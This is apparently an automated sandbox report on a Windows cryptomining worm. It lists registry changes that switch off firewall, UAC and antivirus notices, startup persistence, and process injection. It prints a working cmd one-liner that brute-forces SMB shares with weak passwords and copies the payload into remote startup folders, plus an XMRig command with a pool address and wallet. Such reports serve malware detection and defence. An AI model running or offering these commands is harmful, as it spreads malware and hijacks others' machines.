Analysis
-
max time kernel
41s -
max time network
577s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
06-03-2021 22:27
Static task
static1
Behavioral task
behavioral1
Sample
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Resource
win10v20201028
General
-
Target
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
-
Size
2.3MB
-
MD5
921379bd587ab29da4dc23fb9d47fe36
-
SHA1
e9db1731731503a81a2fdc67ffa005e6aa2a8038
-
SHA256
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6
-
SHA512
90211127d4dd83619bf42a1ab1f5d78d1a9f8ab7767704b19432d681807b636cf2bfbeb5ae97e25b57071e2a04f3b13e5a3f28b69d392b94f7ac0b3015ff38fc
Malware Config
Signatures
-
Modifies firewall policy service 2 TTPs 6 IoCs
Processes:
VID001.exe50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" VID001.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" VID001.exe -
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
XMRig Miner Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe xmrig behavioral3/memory/3100-32-0x0000000000400000-0x00000000009E7000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
VID001.exepid process 2756 VID001.exe -
Processes:
resource yara_rule behavioral3/memory/1108-2-0x0000000002360000-0x00000000033EE000-memory.dmp upx behavioral3/memory/2756-9-0x00000000022E0000-0x000000000336E000-memory.dmp upx -
Deletes itself 1 IoCs
Processes:
VID001.exepid process 2756 VID001.exe -
Drops startup file 1 IoCs
Processes:
VID001.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk VID001.exe -
Loads dropped DLL 2 IoCs
Processes:
VID001.exepid process 2756 VID001.exe 2756 VID001.exe -
Processes:
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" VID001.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
VID001.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\ VID001.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run VID001.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ VID001.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run VID001.exe -
Processes:
VID001.exe50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe -
Enumerates connected drives 3 TTPs 22 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
VID001.exedescription ioc process File opened (read-only) \??\M: VID001.exe File opened (read-only) \??\N: VID001.exe File opened (read-only) \??\Q: VID001.exe File opened (read-only) \??\S: VID001.exe File opened (read-only) \??\V: VID001.exe File opened (read-only) \??\X: VID001.exe File opened (read-only) \??\Y: VID001.exe File opened (read-only) \??\H: VID001.exe File opened (read-only) \??\J: VID001.exe File opened (read-only) \??\L: VID001.exe File opened (read-only) \??\T: VID001.exe File opened (read-only) \??\U: VID001.exe File opened (read-only) \??\W: VID001.exe File opened (read-only) \??\R: VID001.exe File opened (read-only) \??\E: VID001.exe File opened (read-only) \??\F: VID001.exe File opened (read-only) \??\G: VID001.exe File opened (read-only) \??\I: VID001.exe File opened (read-only) \??\K: VID001.exe File opened (read-only) \??\O: VID001.exe File opened (read-only) \??\P: VID001.exe File opened (read-only) \??\Z: VID001.exe -
Drops file in Windows directory 1 IoCs
Processes:
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exedescription ioc process File opened for modification C:\Windows\SYSTEM.INI 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 6 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe nsis_installer_1 C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe nsis_installer_2 C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe nsis_installer_1 C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe nsis_installer_2 C:\Users\Admin\AppData\Local\Temp\0F745672_Rar\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe nsis_installer_1 C:\Users\Admin\AppData\Local\Temp\0F745672_Rar\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe nsis_installer_2 -
Discovers systems in the same network 1 TTPs 3 IoCs
Processes:
net.exenet.exenet.exepid process 1232 net.exe 1556 net.exe 3708 net.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4004 taskkill.exe 3024 taskkill.exe 2160 taskkill.exe 3520 taskkill.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 35 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 1792 PING.EXE 1144 PING.EXE 1328 PING.EXE 2072 PING.EXE 1212 PING.EXE 2828 PING.EXE 3900 PING.EXE 3232 PING.EXE 1832 PING.EXE 3264 PING.EXE 3880 PING.EXE 2728 PING.EXE 1308 PING.EXE 2028 PING.EXE 1692 PING.EXE 3120 PING.EXE 2960 PING.EXE 1256 PING.EXE 3812 PING.EXE 1604 PING.EXE 1288 PING.EXE 3364 PING.EXE 4044 PING.EXE 2100 PING.EXE 1700 PING.EXE 2696 PING.EXE 412 PING.EXE 1348 PING.EXE 3356 PING.EXE 3116 PING.EXE 1892 PING.EXE 3640 PING.EXE 3776 PING.EXE 2548 PING.EXE 1160 PING.EXE -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exepid process 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 2756 VID001.exe 2756 VID001.exe 2756 VID001.exe 2756 VID001.exe 2756 VID001.exe 2756 VID001.exe 2756 VID001.exe 2756 VID001.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exedescription pid process Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 2756 VID001.exe Token: SeDebugPrivilege 2756 VID001.exe Token: SeDebugPrivilege 2756 VID001.exe Token: SeDebugPrivilege 2756 VID001.exe Token: SeDebugPrivilege 2756 VID001.exe Token: SeDebugPrivilege 2756 VID001.exe Token: SeDebugPrivilege 2756 VID001.exe -
Suspicious use of WriteProcessMemory 62 IoCs
Processes:
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exedescription pid process target process PID 1108 wrote to memory of 716 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe fontdrvhost.exe PID 1108 wrote to memory of 724 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe fontdrvhost.exe PID 1108 wrote to memory of 976 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe dwm.exe PID 1108 wrote to memory of 2640 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe sihost.exe PID 1108 wrote to memory of 2664 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe svchost.exe PID 1108 wrote to memory of 2852 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe taskhostw.exe PID 1108 wrote to memory of 2396 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Explorer.EXE PID 1108 wrote to memory of 3312 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe ShellExperienceHost.exe PID 1108 wrote to memory of 3328 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe SearchUI.exe PID 1108 wrote to memory of 3548 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe RuntimeBroker.exe PID 1108 wrote to memory of 3736 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe DllHost.exe PID 1108 wrote to memory of 2756 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe VID001.exe PID 1108 wrote to memory of 2756 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe VID001.exe PID 1108 wrote to memory of 2756 1108 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe VID001.exe PID 2756 wrote to memory of 716 2756 VID001.exe fontdrvhost.exe PID 2756 wrote to memory of 724 2756 VID001.exe fontdrvhost.exe PID 2756 wrote to memory of 976 2756 VID001.exe dwm.exe PID 2756 wrote to memory of 2640 2756 VID001.exe sihost.exe PID 2756 wrote to memory of 2664 2756 VID001.exe svchost.exe PID 2756 wrote to memory of 2852 2756 VID001.exe taskhostw.exe PID 2756 wrote to memory of 2396 2756 VID001.exe Explorer.EXE PID 2756 wrote to memory of 3312 2756 VID001.exe ShellExperienceHost.exe PID 2756 wrote to memory of 3328 2756 VID001.exe SearchUI.exe PID 2756 wrote to memory of 3548 2756 VID001.exe RuntimeBroker.exe PID 2756 wrote to memory of 3736 2756 VID001.exe DllHost.exe PID 2756 wrote to memory of 3812 2756 VID001.exe DllHost.exe PID 2756 wrote to memory of 716 2756 VID001.exe fontdrvhost.exe PID 2756 wrote to memory of 724 2756 VID001.exe fontdrvhost.exe PID 2756 wrote to memory of 976 2756 VID001.exe dwm.exe PID 2756 wrote to memory of 2640 2756 VID001.exe sihost.exe PID 2756 wrote to memory of 2664 2756 VID001.exe svchost.exe PID 2756 wrote to memory of 2852 2756 VID001.exe taskhostw.exe PID 2756 wrote to memory of 2396 2756 VID001.exe Explorer.EXE PID 2756 wrote to memory of 3312 2756 VID001.exe ShellExperienceHost.exe PID 2756 wrote to memory of 3328 2756 VID001.exe SearchUI.exe PID 2756 wrote to memory of 3548 2756 VID001.exe RuntimeBroker.exe PID 2756 wrote to memory of 3736 2756 VID001.exe DllHost.exe PID 2756 wrote to memory of 1736 2756 VID001.exe backgroundTaskHost.exe PID 2756 wrote to memory of 716 2756 VID001.exe fontdrvhost.exe PID 2756 wrote to memory of 724 2756 VID001.exe fontdrvhost.exe PID 2756 wrote to memory of 976 2756 VID001.exe dwm.exe PID 2756 wrote to memory of 2640 2756 VID001.exe sihost.exe PID 2756 wrote to memory of 2664 2756 VID001.exe svchost.exe PID 2756 wrote to memory of 2852 2756 VID001.exe taskhostw.exe PID 2756 wrote to memory of 2396 2756 VID001.exe Explorer.EXE PID 2756 wrote to memory of 3312 2756 VID001.exe ShellExperienceHost.exe PID 2756 wrote to memory of 3328 2756 VID001.exe SearchUI.exe PID 2756 wrote to memory of 3548 2756 VID001.exe RuntimeBroker.exe PID 2756 wrote to memory of 3736 2756 VID001.exe DllHost.exe PID 2756 wrote to memory of 1736 2756 VID001.exe backgroundTaskHost.exe PID 2756 wrote to memory of 716 2756 VID001.exe fontdrvhost.exe PID 2756 wrote to memory of 724 2756 VID001.exe fontdrvhost.exe PID 2756 wrote to memory of 976 2756 VID001.exe dwm.exe PID 2756 wrote to memory of 2640 2756 VID001.exe sihost.exe PID 2756 wrote to memory of 2664 2756 VID001.exe svchost.exe PID 2756 wrote to memory of 2852 2756 VID001.exe taskhostw.exe PID 2756 wrote to memory of 2396 2756 VID001.exe Explorer.EXE PID 2756 wrote to memory of 3312 2756 VID001.exe ShellExperienceHost.exe PID 2756 wrote to memory of 3328 2756 VID001.exe SearchUI.exe PID 2756 wrote to memory of 3548 2756 VID001.exe RuntimeBroker.exe PID 2756 wrote to memory of 3736 2756 VID001.exe DllHost.exe PID 2756 wrote to memory of 1736 2756 VID001.exe backgroundTaskHost.exe -
System policy modification 1 TTPs 2 IoCs
Processes:
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" VID001.exe
Processes
-
C:\Windows\system32\fontdrvhost.exe"fontdrvhost.exe"1⤵
-
c:\windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe"C:\Users\Admin\AppData\Local\Temp\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe"2⤵
- Modifies firewall policy service
- Windows security modification
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe"C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe"3⤵
- Modifies firewall policy service
- Executes dropped EXE
- Deletes itself
- Drops startup file
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im NsCpuCNMiner* & taskkill /f /im IMG0*4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im NsCpuCNMiner*5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im IMG0*5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im uihost* & taskkill /f /im DOC0*4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im uihost*5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im DOC0*5⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe"C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe" -o stratum+tcp://xmr-eu2.nanopool.org:14444 -t 1 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka.V --donate-level=1 --coin monero -p x4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=VID001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\!s!\%j\VID001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" %d) & net use %c /delete /y & ping -n 20 localhost)))4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view|find /i "\\" || arp -a|find /i " 1"5⤵
-
C:\Windows\SysWOW64\net.exenet view6⤵
- Discovers systems in the same network
-
C:\Windows\SysWOW64\find.exefind /i "\\"6⤵
-
C:\Windows\SysWOW64\ARP.EXEarp -a6⤵
-
C:\Windows\SysWOW64\find.exefind /i " 1"6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c set str_5⤵
-
